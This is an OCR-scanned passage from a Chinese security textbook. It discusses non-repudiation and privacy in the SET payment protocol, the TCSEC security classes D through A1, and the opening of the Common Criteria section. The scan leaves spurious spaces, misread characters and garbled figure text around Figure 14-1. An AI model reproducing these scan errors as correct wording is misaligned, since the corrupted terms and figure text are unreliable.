些 特 性 ,相对 于 长 期 间 都 使 用 同一 把 密 钥 加 密 来 说 ,就 算 某 次 的 通信 密 钥 遭 到 破解 ,也 不 会 
影响 到 其 他 交易 数据 的 安全 性 。 


4. 抗 否认 性 


一 般 来 说 ,人 们 对 于 日 常生 活 中 的 交易 持 较 为 放心 及 信赖 的 态度 ,这 种 现象 出 自 于 消费 
者 眼见 为 实 的 心态 。 而 在 因特网 环境 的 商务 活动 中 ,参与 交易 者 并 不 是 直接 面对面 ,因此 可 
信赖 安全 环境 更 为 重要 。 抗 否认 性 提供 了 一 种 交易 承诺 的 保障 ,其 功能 是 在 交易 的 过 程 中 
保留 证 据 , 除 了 能 够 约束 交易 参与 者 正确 、 合 法 的 行为 外 ,同时 也 解决 随后 可 能 发 生 的 争议 。 

SET 协议 可 以 利用 数字 签名 技术 来 产生 不 可 和 否认 的 证 据 , 其 中 双重 签名 也 隐 含 了 这 个 
功能 。 基 于 银行 对 商店 不 信任 的 假设 ,银行 可 利用 商店 转交 持 卡 人 的 支付 信息 以 及 请 求 授 
权 信息 ,来 防止 商店 否认 与 使 用 者 的 交易 内 容 。SET 所 欠缺 的 是 没有 提 及 应 该 如 何 处 理 这 
些 交 易 记录 ,即将 相关 的 记录 连接 成 为 完整 的 证 据 ,因此 零散 的 记录 散 置 在 各 处 。 同 时 ， 
SET 也 没有 明确 要 求 当事人 储存 这 些 记录 ,而 将 这 部 分 的 工作 交 给 各 个 系统 开发 者 自行 设 
计 。 纵 使 个 别 的 交易 参与 者 将 这 些 记 录 储存 起 来 ,也 缺少 了 适当 的 管理 方法 使 得 证 据 不 够 
完整 ,这 将 无 法 发 挥 应 有 的 效果 。 另 外 ,SET 安全 交易 说 明 书 在 业务 叙述 的 部 分 ,也 清楚 提 
到 了 现 阶 段 的 SET 协议 在 使 用 密码 技术 提供 的 服务 里 ,并 没有 赛 括 交易 的 抗 否 认 人 性 方面 的 
服务 。 


5. 隐私 权 的 安全 保护 
由 于 电子 支付 系统 对 于 交易 个 体 间 信任 关系 假设 的 差异 ,导致 交易 协议 采取 不 同 的 安 
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全 保障 方法 ,也 因此 产生 了 不 同 程度 的 隐私 保护 。SET 协议 为 了 提供 消费 者 隐私 权 的 保 
护 , 使 用 了 一 个 重要 的 创新 技术 , 即 双重 签名 , 它 根据 信息 分 离 的 方式 将 交易 信息 分 开 ,使 得 
商店 取得 订购 信息 而 银行 接收 支付 信息 ; 另外 为 了 避免 日 后 可 能 发 生 购买 金额 与 商品 内 容 
的 争议 ,因此 两 笔 信 息 间 必 须要 具有 连接 关系 ,这 种 情况 若 以 一 般 人 工 操作 的 处 理 方式 ,是 
在 两 份 文 件 上 盖 上 同一 个 戳记 ,而 对 应 用 到 计算 机 作业 上 则 是 采用 双重 签名 来 完成 。 

就 协议 设计 的 角度 来 看 ,SET 协议 是 从 银行 的 角度 来 考虑 ,所 以 对 于 隐私 的 保护 是 建 
立 在 信任 银行 的 假设 上 。 事 实 上 ,银行 可 能 汇集 持 卡 人 个 别 交 易 的 支付 信息 ,如 果 缺 乏 适 当 
的 防范 措施 ,将 导致 持 卡 人 隐私 泄露 的 风险 。 总 的 来 说 ,SET 协议 在 个 别 交 易 层 次 提供 了 
个 人 密 钥 数据 的 保护 即 双重 签名 ,但 是 并 没有 考虑 日 后 银行 进行 资料 汇集 的 处 理 可 能 侵犯 
的 个 人 隐私 问题 。 这 样 的 伤害 却 有 其 于 单 笔 加 密 信息 可 能 泄露 的 危害 ,所 以 机 密 性 只 是 隐 
私 权 的 一 部 分 ,而 两 者 并 不 能 完全 划 上 等 号 。 


安全 评价 标准 


随 着 信息 技术 的 发 展 ,信息 技术 的 安全 问题 变 得 越 来 越 严 重 。 面 对 一 个 信息 系统 (包括 
各 种 软 \ 硬 件 , 以 及 系统 集成 ) ,用 户 们 的 首要 担忧 就 是 ,这 个 系统 安全 吗 ” 所 以 ,计算 机 系统 
的 提供 者 需要 对 他 们 的 产品 的 安全 特性 进行 说 明 , 而 用 户 则 需要 验证 这 些 安全 特性 的 可 
靠 性 。 

然而 ,普通 的 用 户 和 系统 购买 者 都 不 是 安全 专家 ,他 们 难以 对 产品 的 安全 性 进行 准确 和 
充分 的 验证 ,难以 判断 系统 提供 者 所 提供 的 安全 证 明 的 有 效 性 ,或 者 以 任何 方式 来 确定 这 些 
系统 确实 实现 了 应 该 实现 的 安全 策略 。 

因而 ,独立 的 第 三 方 计算 机 安全 评价 是 非常 必要 的 。 因 为 独立 的 计算 机 安全 专家 能 够 
对 系统 的 安全 需求 .设计 实现 和 保证 证 据 等 进行 审查 。 对 于 非 安 全 专家 的 用 户 来 说 ,独立 
安全 专家 的 评价 是 最 合适 的 。 国 际 上 有 多 种 为 计算 机 安全 系统 构筑 独立 审查 措施 的 安全 评 
价 体系 ,这 些 评 价 标准 能 够 完善 而 准确 地 表达 信息 系统 的 安全 性 以 及 评价 信息 系统 安全 性 
的 方法 和 准则 ,是 信息 安全 技术 的 基础 ,其 内 容 和 发 展 深刻 地 反映 了 对 信息 安全 问题 的 认识 
程度 。 了 解 其 现状 和 发 展 对 信息 安全 技术 的 研究 十 分 重要 ,也 是 开发 和 评测 各 种 信息 安全 
技术 的 依据 。 


141 可 信 计 算 机 系统 评价 标准 


在 计算 机 应 用 的 早期 ,由 于 计算 机 的 应 用 领域 越 来 越 广 泛 ,尤其 大 型 机 被 应 用 到 政府 、 
军事 ,金融 等 重要 部 门 ,计算 机 系统 的 可 靠 性 、 安 全 性 逐渐 得 到 了 人 们 的 重视 。 如 何 评价 计 
算 机 系统 的 安全 成 为 各 国政 府 和 计算 机 用 户 所 关心 的 问题 。1970 年 美国 国防 部 在 国家 安 
全 局 建立 了 计算 机 安全 评估 中 心 , 开 始 了 计算 机 安全 评估 的 理论 与 技术 的 研究 ,研究 的 核心 
问题 是 计算 机 操作 系统 的 安全 问题 。1985 年 12 月 美国 国防 部 公布 了 评价 安全 计算 机 系统 
的 六 项 标准 。 这 套 标准 的 文献 名 称 即 为 “可 信 计 算 机 系统 评价 标准 ”(Trusted Computer 
System Evaluation Criteria,TCSEC) ,又 称 为 橘 皮 书 .。“ 可 信 ? 即 可 信赖 ,安全 可 靠 。 该 标准 
旨 在 提供 一 种 标准 ,使 用 户 可 以 对 其 计算 机 系统 内 敏感 信息 安全 操作 的 可 信 程 度 做 出 评 
估 , 同 时 给 计算 机 行业 的 制造 商 提供 一 种 可 循 的 指导 规则 ,使 其 产品 能 够 更 好 的 满足 敏感 应 
用 的 安全 需求 。 

TCSEC 最 初 只 是 军用 标准 ,后 来 延至 民用 领域 , 它 是 计算 机 系统 安全 评估 的 第 一 个 正 
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式 标准 ,具有 划时代 的 意义 。 


14.1.1 TCSEC 的 主要 概念 


1. 考核 标准 


为 了 阐述 对 可 信 计 算 机 的 考核 标准 ,TCSEC 首先 提出 了 主体 与 客体 的 概念 。 

主体 (Subject) , 即 计 算 机 系统 的 主动 访问 者 ,如 用 户 ( 包 括 入 侵 者 )、 用 户 运 行 的 程序 
(包括 入 侵 者 的 恶意 程序 ) 、 用 户 的 复制 .删除 \ 修 改 等 操作 都 是 主体 。 被 访问 或 被 使 用 的 对 
象 称 为 客体 (Object) 。 对 资源 的 访问 控制 抽象 为 主体 集合 对 客体 集合 的 监视 与 控制 。 在 主 
体 与 客体 的 概念 体系 下 ,TCSEC 提出 了 评价 安全 计算 机 系统 的 六 项 标准 。 

(1) 安全 策略 (Security Policy)。 必 须 有 一 项 明确 的 由 计算 机 系统 实施 的 安全 策略 。 
系统 中 必须 有 可 供 系 统 使 用 的 访问 规则 的 集合 ,以 便 决定 是 否 允 许 某 主体 对 特定 客体 的 访 
问 。 这 些 访 问 规则 包括 阻止 未 授权 用 户 对 敏感 信息 的 访问 。 支 持 自主 访问 控制 ,保证 只 有 
指定 的 用 户 或 用 户 组 才能 获得 对 数据 的 访问 权 。 必 须根 据 安全 策略 ,在 可 信 计 算 机 系统 中 
实现 这 些 访 问 规则 。 

(2) 标识 (Identification) 。 必 须 能 够 对 系统 中 的 每 个 主体 进行 标识 ,使 它们 都 可 以 唯一 
的 和 可 靠 的 被 辨识 。 为 了 能 够 让 系统 检验 每 个 主体 的 访问 请 求 , 这 种 标识 是 必需 的 。 系 统 
必须 对 每 个 主体 识别 后 , 才 允 许 它 对 客体 进行 访问 。 在 系统 中 每 次 对 客体 的 访问 ,都 需要 识 
别 主体 的 身份 .安全 级 别 和 对 应 的 有 权 访 问 的 客体 ,对 主体 的 识别 与 授权 信息 必须 由 计算 机 
系统 秘密 进行 ,并 与 完成 某 些 安全 有 关 动 作 的 每 个 活动 元 素 结合 起 来 。 

(3) 标记 (Marking)。 对 每 个 客体 都 要 做 一 个 敏感 性 标记 (Sensitivity Labels) ,用 于 规 
定 该 客体 的 安全 等 级 ,并 且 保证 每 次 对 客体 访问 时 都 能 得 到 该 客体 的 标记 ,以 便 在 访问 之 前 
可 以 进行 核查 。 对 每 个 客体 进行 标记 也 是 为 了 支持 强制 访问 控制 的 安全 策略 。 客 体 的 标记 
既 要 包含 客体 的 敏感 级 别 , 也 包括 允许 哪些 主体 可 以 对 本 客体 进行 访问 的 方式 。 

(4) 可 记 账 性 (Accountability) ,或 称 责 任 。 系 统 必须 能 够 记录 所 有 影响 系统 安全 的 各 
种 活动 。 这 些 活 动 包 括 有 新 用 户 登 录 到 系统 中 ,发 生 了 修改 主体 或 客体 的 安全 级 别 的 事件 ， 
发 生 了 拒绝 访问 的 事件 ,发生 了 多 次 注册 失败 的 事件 。 对 与 系统 信息 安全 有 关 的 事件 应 该 
有 选择 地 记录 与 保存 , 即 审计 , 以 便 对 影响 系统 安全 的 活动 进行 追踪 ,确定 责任 者 。 系 统 对 
审计 信息 必须 妥善 保护 ,防止 对 审计 信息 的 恶意 算 改 或 未 经 授权 的 毁坏 。 

(5) 保障 机 制 (Assurance)。 为 了 实现 上 述 各 种 安全 能 力 与 机 制 , 在 系统 中 必须 提供 相 
应 的 硬件 与 软件 的 保障 机 制 与 设施 ,并 且 能 够 对 这 些 机 制 进行 有 效 的 评价 。 这 些 机 制 可 以 
嵌入 在 操作 系统 内 ,并 以 秘密 的 方式 执行 指定 的 任务 。 还 应 该 在 文档 中 写 明 ,这些 机 制 是 否 
能 够 独立 考察 .评估 和 检验 其 结果 是 否 充分 。 

(6) 连续 性 保护 (Continuous Protection) 。 系 统 的 上 述 安 全 机 制 必须 受到 连续 性 的 保 
护 ,防止 未 经 许可 的 中 途 修改 或 损坏 。 如 果实 现 了 上 述 策略 的 硬件 和 软件 本 身 是 客体 ,那么 
这 些 安全 机 制 的 可 靠 性 就 受到 威胁 ,进而 威胁 到 计算 机 系统 的 可 信人 性 。 


2. 主要 概念 
在 TCSEC 中 提出 了 以 下 主要 概念 ,以 描述 计算 机 系统 的 安全 问题 。 
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(1) 安全 性 。 包 括 安全 策略 ,策略 模 型 ,安全 服务 和 安全 机 制 等 内 容 , 其 中 安全 策略 是 
为 了 实现 软件 系统 的 安全 而 制定 的 有 关 管 理 、 保 护 和 发 布 敏感 信息 的 规定 与 实施 细则 ; 策 
略 模型 时 指 实施 安全 策略 的 模型 ; 安全 服务 是 指 根据 安全 策略 和 安全 模型 提供 的 安全 方面 
的 服务 ; 安全 机 制 是 实现 安全 服务 的 方法 。 

(2) 可 信 计 算 基 (Trusted Computing Base,TCB)。TCB 是 软件 ,硬件 与 固件 的 有 机 集 
合 , 它 根据 访问 控制 策略 处 理 主体 集合 对 客体 集合 的 访问 ,TCB 中 包含 了 所 有 与 系统 安全 
有 关 的 功能 。 

(3) 自主 访问 控制 (Discretionary Access Control,DAC)。DAC 是 指 资源 的 所 有 者 ( 即 
主体 ) 可 以 自主 地 确定 别人 对 其 资源 的 访问 权 。 具 有 某 类 权限 的 主体 能 够 将 其 对 某 资源 ( 客 
体 ) 的 访问 权 直接 或 间接 地 按照 需要 动态 地 转让 给 其 他 主体 或 回收 转让 给 其 他 主体 的 访问 
权限 。 

(4) 强制 访问 控制 (Mandatory Access Control, MAC)。MAC 是 比 自主 访问 更 为 严格 
的 一 种 访问 控制 方式 。 在 这 种 访问 方式 中 ,客体 的 访问 权限 不 能 由 客体 的 拥有 者 自己 确定 ， 
而 是 由 系统 管理 者 强制 规定 的 。 系 统管 理 者 为 主体 与 客体 规定 安全 属性 (安全 级 别 、 权 限 
等 ) ,系统 安全 机 制 严格 按照 主体 与 客体 的 安全 属性 控制 主体 对 客体 的 访问 ,对 于 系统 管理 
员 确定 的 安全 属性 ,任何 主体 都 不 能 修改 与 转让 。 

(5) 隐蔽 信道 。 指 一 个 进程 利用 违反 系统 安全 的 方式 传输 信息 。 有 两 类 隐蔽 信道 : 存 
储 信道 与 时 钟 信道 。 存 储 信道 是 一 个 进程 通过 存储 介质 向 另 一 个 进程 直接 或 间接 传递 信息 
的 信道 ; 时 钟 信道 是 指 一 个 进程 通过 执行 与 系统 时 钟 有 关 的 操作 把 不 能 泄露 的 信息 传递 给 
另 一 个 进程 的 通信 信道 。 例 如 ,一 个 文件 的 读 写 属性 位 可 以 成 为 隐蔽 存储 信道 ,而 按 某 种 频 
率 创建 于 删除 一 个 文件 可 以 形成 一 个 时 钟 隐蔽 信道 。 

此 外 ,还 有 认证 ,加 密 、 授 权 与 保护 等 概念 。 


3. 系统 模型 


评估 准则 中 采用 的 可 信 计 算 机 系统 的 安全 模型 采用 了 访问 监控 器 的 概念 。 访 问 监控 器 
映射 计算 机 系统 的 可 信 计 算 基 TCB, 即 安全 核 , 它 
的 作用 是 负责 实施 系统 的 安全 策略 ,在 主体 和 客体 
之 间 对 所 有 的 访问 操作 实施 监控 ,访问 监控 器 的 作 
用 如 图 14-1 所 示 。 

图 14-1 中 的 主体 表示 系统 中 访问 操作 的 发 起 


监控 器 数据 基 : 
(用 户 权 限 表 、 
访问 控制 表 ) 


者 ,可 以 是 用 户 ,或 者 代表 用 户 意图 的 进程 等 ; 客体 

是 访问 操作 的 对 象 ,包括 文件 .目录 ,内 存 区 、 或 进 于 汪 ly 

程 等 ; 监视 器 数据 基 主要 存放 用 户 权 限 和 对 客体 的 | 

访问 关系 等 信息 ; 访问 监控 器 是 实现 系统 安全 策略 审计 信息 
[| 


的 机 制 ,是 系统 的 可 信 计 算 机 。 它 对 于 主体 提出 的 
每 一 次 访问 请 求 ,根据 访问 监控 数据 基 中 定义 的 访 四 基于 访问 监 入 和 的 系统 安全 代 覃 
间 关 系 与 访问 权 决定 是 否 同意 这 次 访问 的 执行 ,并 

进行 相应 的 审计 记录 。 
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1412 计算 机 系统 的 安全 等 级 


TCSEC 将 可 信 计 算 机 系统 的 评价 规则 划分 为 四 类 , 即 安全 策略 、 可 记 账 性 ,安全 保证 措 
施 和 文档 。 

安全 策略 包括 自主 存 取 控 制 .客体 重用 、 标 记 、 标 记 完 整 性 .标记 信息 的 扩散 .主体 敏感 
度 标记 ,设备 标记 等 规则 、 强 制 存 取 控 制 等 规则 ; 可 记 账 性 包括 标识 与 认证 、 可 信 路 径 、 审 计 
等 规则 ; 安全 保障 措施 包括 系统 体系 结构 .系统 完整 性 、 隐 项 信道 分 析 、` 可 信 设 施 管理 .可 信 
恢复 .生命 周期 保证 .安全 测试 .设计 规范 和 验证 .配置 管理 .可 信和 分 配 等 规则 ; 文档 包括 安 
全 特性 用 户 指南 .可 信 设 施 手 册 、 测 试 文档 .设计 文档 等 规则 。 

根据 计算 机 系统 对 上 述 各 项 指标 的 支持 情况 及 安全 性 相近 的 特点 ,TCSEC 将 系统 划分 
为 四 类 (Division) 七 个 等 级 ,依次 是 D; C(C1,C2); B(B1,B2,B3); A(A1l), 按 系统 可 靠 或 
可 信 程度 逐渐 增高 ,如 表 14-1 所 示 。 


表 14-1 TCSEC 安全 级 别 划 分 


安全 级 别 定 时 
Al 验证 设计 (Verified Design) 
B3 安全 域 (Security Domains) 
B2 结构 化 保护 (Structural Protection) 
Bl 标记 安全 保护 (Labeled Security Protection) 
C2 受 控 的 存 取保 护 (Controlled Access Protection) 
Cd 自主 安全 保护 (Discretionary Security Protection) 
D 最 小 保护 (Minimal Protection) 


在 TCSEC 中 建立 的 安全 级 别 之 间 具 有 一 种 偏 序 向 下 兼容 的 关系 , 即 较 高 安全 性 级 别 
提供 的 安全 保护 要 包含 较 低 级 别 的 所 有 保护 要 求 ,同时 提供 更 多 或 更 完善 的 保护 能 力 。 


1. D 安全 级 


D 级 是 最 低级 别 。 保 留 D 级 的 目的 是 为 了 将 一 切 不 符合 更 高 标准 的 系统 ,统统 归于 D 
级 。 如 DOS 就 是 操作 系统 中 安全 标准 为 D 的 典型 例子 。 它 具有 操作 系统 的 基本 功能 ,如 
文件 系统 、 进 程 调度 等 ,但 在 安全 性 方面 几乎 没有 什么 专门 的 机 制 来 保障 。 


2. C1 安全 级 


C1 级 系统 只 提供 了 非常 初级 的 自主 安全 保护 。 能 够 实现 对 用 户 和 数据 的 分 离 , 进 行 自 
主 访问 控制 (DAC) ,保护 或 限制 用 户 权限 的 传播 。 现 有 的 商业 系统 往往 稍 做 改进 即 可 满足 
C1 级 系统 称 为 自主 安全 保护 系统 。 此 类 系统 是 针对 多 个 协作 用 户 在 同一 敏感 级 别 上 
处 理 数据 的 工作 环境 。 其 最 主要 的 特点 是 把 用 户 与 数据 隔离 ,提供 自主 访问 控制 功能 ,使 用 
户 可 以 对 自己 的 资源 自主 地 确定 何 时 使 用 或 不 使 用 控制 ,以 及 允许 哪些 主体 或 组 进行 访问 。 
通过 用 户 拥有 者 的 自主 定义 和 控制 ,可 以 防止 自己 的 数据 被 别 的 用 户 有 意 或 无 意 地 算 改 、 干 
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涉 或 破坏 。 该 安全 级 要 求 在 进行 任何 活动 之 前 ,通过 TCB 去 确认 用 户 身 份 (如 口令 ), 并 保 
护 确认 数据 ,以 免 未 经 授权 对 确认 数据 的 访问 和 修改 。 这 类 系统 在 硬件 上 必须 提供 某 种 程 
度 的 保护 机 制 ,使 之 不 易 受到 损害 ; 用 户 必须 在 系统 注册 建立 账户 并 利用 通行 证 让 系统 能 
够 识别 他 们 。C1 级 要 求 较 严 格 的 测试 ,以 检测 该 类 系统 是 否 实现 了 设计 文档 上 说 明 的 安全 
要 求 。 另 外 还 要 进行 攻击 性 测试 ,以 保证 不 存在 明显 的 漏洞 让 非法 用 户 攻破 而 绕 过 系统 的 
安全 机 制 进入 系统 。 另 外 ,Cl 级 系统 要 求 完善 的 文档 资料 。 


3. C2 安全 级 


C2 安全 级 称 为 可 控 安 全 保护 级 ,是 安全 产品 的 最 低档 次 ,提供 受 控 的 存 取保 护 , 即 将 
Cl 级 的 DAC 进一步 细 化 ,保护 粒度 要 达到 单个 用 户 和 单个 客体 一 级 ,以 个 人 身份 注册 负 
责 , 并 实施 审计 和 资源 隔离 。 它 通过 注册 过 程 .与 安全 相关 事件 的 审计 和 资源 隔离 ,使 得 用 
户 的 操作 具有 可 追踪 性 。C2 级 增加 了 审计 功能 ,审计 粒度 必须 能 够 跟踪 每 个 主体 对 每 个 客 
体 的 每 一 次 访问 ,审计 功能 是 C2 较 Cl 新 增加 的 安全 要 求 。 在 安全 策略 方面 ,除了 具备 Cl 
级 所 有 功能 外 ,还 提供 授权 服务 、 对 访问 权利 扩散 的 控制 。C2 级 还 提供 客体 再 用 功能 , 即 要 
求 在 一 个 过 程 运 行 结束 后 ,要 消除 该 过 程 残 留 在 内 存 、 外 存 和 寄存 器 中 的 信息 ,在 另 一 个 用 
户 过 程 运行 之 前 必须 清除 或 覆盖 这 些 客体 的 残留 信息 。C2 系统 的 TCB 必须 保存 在 特定 区 
域 中 ,以 防止 外 部 人 员 的 算 改 。 

很 多 商业 产品 已 得 到 该 级 别 的 认证 。 达 到 C2 级 的 产品 在 其 名 称 中 往往 不 突出 “安全 ” 
(Security) 这 一 特色 ,如 操作 系统 中 Microsoft 的 Windows NT 3.5, 数 字 设 备 公 司 的 Open 
VMS VAX 6.0 和 6.1。 数 据 库 产品 有 Oracle 公司 的 Oracle 7,Sybase 公司 的 SQL Server 
11.0.6 等 。 


4. B1 安全 级 


B 类 安全 包含 三 个 级 别 : B1 级 、B2 级 、B3 级 ,他 们 都 采用 强制 保护 控制 机 制 。B1 级 又 
称 为 带 标记 的 访问 控制 保护 级 ,其 在 C2 级 的 基础 上 增加 了 或 加 强 了 标记 、 强 制 访问 控制 、 
审计 、 可 记 账 性 和 保障 等 功能 。 

在 Bl 级 中 标记 起 着 重要 的 作用 ,是 强制 访问 控制 实施 的 依据 。 每 个 主体 和 存储 客体 
有 关 的 标记 都 要 由 TCB 维护 。Bl 级 对 标记 的 内 容 与 适用 有 以 下 要 求 。 

(1) 主体 与 客体 的 敏感 标记 的 完整 性 : 当 TCB 输出 敏感 标记 时 ,应 准确 对 应 内 部 标记 ， 
并 输出 相应 的 关联 信息 。 

(2) 标记 信息 的 输出 : 人 工 制定 每 个 1/O 信道 与 1/O 设备 是 单 (安全 ) 级 的 还 是 多 ( 安 
全 ) 级 的 ,TCB 应 能 知道 这 种 指定 ,并 能 对 这 种 指定 活动 进行 审计 。 

(3) 多 级 设备 输出 : 当 TCB 把 一 个 客体 输出 到 多 级 IO 设备 时 ,敏感 标记 也 应 同时 输 
出 ,并 与 输出 信息 一 起 留存 在 同一 物理 介质 上 。 当 TCB 使 用 多 级 1/O 信道 通信 时 ,协议 应 
能 支持 多 敏感 标记 信息 的 传输 。 

(4) 单 级 设备 的 输出 : 虽然 不 要 求 对 单 级 1/O 设备 和 单 级 信道 所 处 理 的 信息 保留 敏感 
标志 ,但 要 求 TCB 提供 一 种 安全 机 制 ,允许 用 户 利用 单 级 设备 与 单 级 1/O 信道 安全 地 传输 
单 级 信息 。 

(5) 敏感 标记 的 输出 : 系统 管理 员 应 该 能 够 指定 与 输出 敏感 标记 相关 联 的 可 打印 标记 
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,这 些 敏感 标记 可 以 是 秘密 、 机 密 和 绝密 的 。TCB 应 能 标识 这 些 敏感 标记 输出 的 开始 与 


Bl 级 能 够 较 好 地 满足 大 型 企业 或 一 般 政府 部 门 对 数据 的 安全 需求 ,这 一 级 别 的 产品 才 
被 认为 是 真正 意义 上 的 安全 产品 。 满 足 此 级 别 的 产品 前 一 般 多 冠 以 “安全 ”(Security) 或 可 
信和 的 ”(Trusted) 字 样 ,作为 区 别 于 普通 产品 的 安全 产品 出 售 。 例 如 ,操作 系统 方面 ,典型 的 
有 数字 设备 公司 的 SEVMS VAX Version 6. 0, 惠 普 公 司 的 HP-UX BLS release 9. 0. 9 十 。 
数据 库 方面 则 有 Oracle 公司 的 Trusted Oracle 7,Sybase 公司 的 Secure SQL Server version 
11.0.6,Informix 公司 的 Incorporated INFORMIX-OnLine / Secure 5.0 等 。 


5. B2 安全 级 


B2 安全 级 称 为 结构 化 保护 级 。 该 级 系统 的 设计 中 把 系统 内 部 结构 化 地 划分 成 明确 而 
大 体 上 独立 的 模块 ,并 采用 最 小 特权 原则 进行 管理 。B2 级 不 仅 要 求 对 所 有 对 象 加 标记 ,而 
且 要 求 给 设备 (磁盘 或 终端 ) 分 配 一 个 或 多 个 安全 级 别 (实现 设备 标记 ) 。 必 须 对 所 有 的 主体 
与 客体 (包括 设备 ) 实 施 强制 性 访问 控制 保护 ,必须 要 有 专职 人 员 负 责 实施 访问 控制 策略 ,其 
他 用 户 无 权 管 理 。 通 过 建立 形式 化 的 安全 策略 模型 并 对 系统 内 的 所 有 主体 和 客体 实施 自主 
访问 控制 和 强制 访问 控制 。 

B2 级 较 Bl 级 有 一 项 更 强 的 设计 要 求 ,B2 级 系统 的 设计 与 实现 必须 经 得 起 更 彻底 的 测 
试 和 审查 ,必须 给 出 可 验证 的 顶级 设计 (Top-Level Design) ,并 且 通 过 测试 确保 该 系统 实现 
了 这 一 设计 。 还 需要 对 隐蔽 信道 进行 分 析 ,确保 系统 不 存在 各 种 安全 漏洞 。 实 现 中 必须 为 
安全 系统 自身 的 执行 维护 一 个 保护 域 ,必须 确保 该 域 的 安全 性 不 受 外 界 的 破坏 ,进而 保护 整 
个 系统 的 目标 代码 和 数据 的 完整 性 不 受 外 界 破坏 。 

目前 ,经 过 认证 的 B2 级 以 上 的 安全 系统 非常 稀少 。 例 如 ,符合 B2 标准 的 操作 系统 只 
有 Trusted Information Systems 公司 的 Trusted XENIX 一 种 产品 ,符合 B2 标准 的 网 络 产 
品 只 有 Cryptek Secure Communications 公司 的 LLC VSLAN 一 种 产品 ,而 数据 库 方 面 则 没 
有 符合 B2 标准 的 产品 。 


6. B3 安全 级 


B3 安全 级 又 称 为 安全 域 保护 级 。 该 级 的 TCB 必须 满足 访问 监控 器 的 要 求 , 审 计 跟 踪 
能 力 更 强 ,并 提供 系统 恢复 过 程 。B3 安全 级 要 求 系统 有 主体 /客体 的 区 域 ,有 能 力 实 现 对 每 
个 目标 的 访问 控制 ,使 每 次 访问 都 受到 检查 。 用 户 程序 或 操作 被 限定 在 某 个 安全 域内 ,安全 
域 间 的 访问 受到 严格 控制 。 这 类 系统 通常 采用 硬件 设施 来 加 强 安全 域 的 安全 ,例如 内 存 管 
理 硬件 用 于 保护 安全 域 免 受 无 权 主 体 的 访问 或 防止 其 他 域 的 主体 的 修改 。 该 级 别 要 求 用 户 
的 终端 必须 通过 可 信 的 信道 连接 在 系统 上 。 

为 了 能 够 确实 进行 广泛 而 可 信 的 测试 ,B3 级 系统 的 安全 功能 应 该 是 短小 精 悍 的 。 为 了 
便于 理解 与 实现 ,系统 的 高 级 设计 (High Level Design) 必 须 是 简明 而 完善 的 ,必须 组 合 使 用 
有 效 的 分 层 ,抽象 和 信息 隐蔽 等 原则 。 所 实现 的 安全 功能 必须 是 高 度 防 突破 的 ,系统 的 审计 
功能 能 够 区 分 出 何 时 能 避免 一 种 破坏 安全 的 活动 。 为 了 使 系统 具备 恢复 能 力 ,B3 级 系统 增 
加 了 一 个 安全 策略 。 

(1) 安全 策略 : 采用 访问 控制 列表 进行 控制 ,允许 用 户 指定 和 控制 对 客体 的 共享 ,也 可 
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以 指定 命名 用 户 对 客体 的 访问 方式 。 

(2) 可 记 账 性 : 系统 能 够 监视 安全 审计 事件 的 发 生 与 积累 , 当 超 出 某 个 安全 姜 值 时 ,能 
够 立刻 报警 ,通知 安全 管理 人 员 进 行 处 理 。 

(3) 保障 措施 : 只 能 完成 与 安全 有 关 的 管理 功能 ,对 其 他 完成 非 安 全 功能 的 操作 要 严 
格 限制 。 当 系统 出 现 故障 与 灾难 性 事件 后 ,要 提供 一 种 过 程 与 机 制 ,保证 在 不 损坏 保护 的 条 
件 下 ,使 系统 得 到 恢复 。 


7. A1 安全 级 


Al 安全 级 又 称 为 可 验证 设计 保护 级 , 即 提供 B3 级 保护 的 同时 给 出 系统 的 形式 化 设 
计 说 明和 验证 以 确信 各 安全 保护 真正 实现 。Al 级 与 B3 级 相似 ,对 系统 的 结构 和 策略 不 
做 特别 要 求 。Al 系统 的 显著 特征 是 ,系统 的 设计 者 必须 按照 一 个 正式 的 设计 规范 来 分 
析 系 统 。 对 系统 分 析 后 ,设计 者 必须 运用 核对 技术 来 确保 系统 符合 设计 规范 。Al 系统 
必须 满足 下 列 要 求 : 系统 管理 员 必须 从 开发 者 那里 接收 到 一 个 安全 策略 的 正式 模型 ; 所 
有 的 安装 操作 都 必须 由 系统 管理 员 进 行 ; 系统 管理 员 进 行 的 每 一 步 安装 操作 都 必须 有 正 
式 文档 。 

Al 安全 级 的 设计 要 求 非常 严格 ,达到 这 种 要 求 的 系统 很 少 。 目 前 已 获得 承认 的 此 类 
系统 有 Honeywell 公司 的 SCOMP 系统 。Al 安全 级 标准 是 安全 信息 系统 的 最 高 安全 级 
别 ,一般 信息 系统 很 难 达到 这 样 的 安全 能 力 。 


142 通用 评估 准则 


CCCCommon Criteria for Information Technology Security Evaluation) 标 准 是 国际 标 
准 化 组 织 ISO/VIEC JTC1 发 布 的 一 个 标准 ,其 标准 编号 为 ISO/IEC 15408, 它 是 信息 技术 安 
全 性 通用 评估 准则 ,用 来 评估 信息 系统 或 者 信息 产品 的 安全 性 。 

国际 标准 化 组 织 ISO 从 1990 年 开始 信息 技术 安全 评价 通用 准则 。1993 年 6 月 ， 
CTCPEC、FC、TCSEC 和 ITSEC 等 发 起 组 织 开 始 联 合 起 来 ,将 各 自 独 立 的 准则 组 合成 一 个 
单一 的 能 广泛 应 用 的 IT 安全 准则 。 

发 起 组 织 包 括 六 国 七 方 : 加 拿 大 ,法 国 、 德 国 、 荷 兰 、 英 国 、 美 国 NIST 及 美国 NSA ,各 方 
代表 建立 的 CC 编辑 委员 会 来 开发 CC。1996 年 1 月 完成 CC 1.0 版 ; 1997 年 10 月 完成 
CC 2.0 测试 版 ; 1998 年 5 月 发 布 CC 2.0 版; 1999 年 12 月 ISO 采纳 CC, 并 作为 国际 标准 
ISO/IEC 15408 正式 发 布 。 目 前 ,已 有 20 多 个 国家 已 经 或 打算 加 入 CC 互 认 协议 。 我 国 与 
之 相对 应 的 标准 为 (信息 系统 安全 性 评估 准则 和 测试 规范 》。 


1421 CC 的 主要 用 户 


CC 的 主要 用 户 包 括 消费 者 、 开 发 者 和 评估 者 。 
1. 消费 者 
当 消 费 者 选择 IT 安全 要 求 来 表达 他 们 的 组 织 需 求 时 ,CC 起 到 重要 的 技术 支持 作用 。 
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当 作为 信息 技术 安全 性 需求 的 基础 和 制作 依据 时 ,CC 能 确保 评估 满足 消费 者 的 需求 。 
消费 者 可 以 用 评估 结果 来 决定 一 个 已 评估 的 产品 和 系统 是 否 满足 他 们 的 安全 需求 。 这 
些 需 求 就 是 风险 分 析 和 政策 导向 的 结果 。 消 费 者 也 可 以 用 评估 结果 来 比较 不 同 的 产品 和 
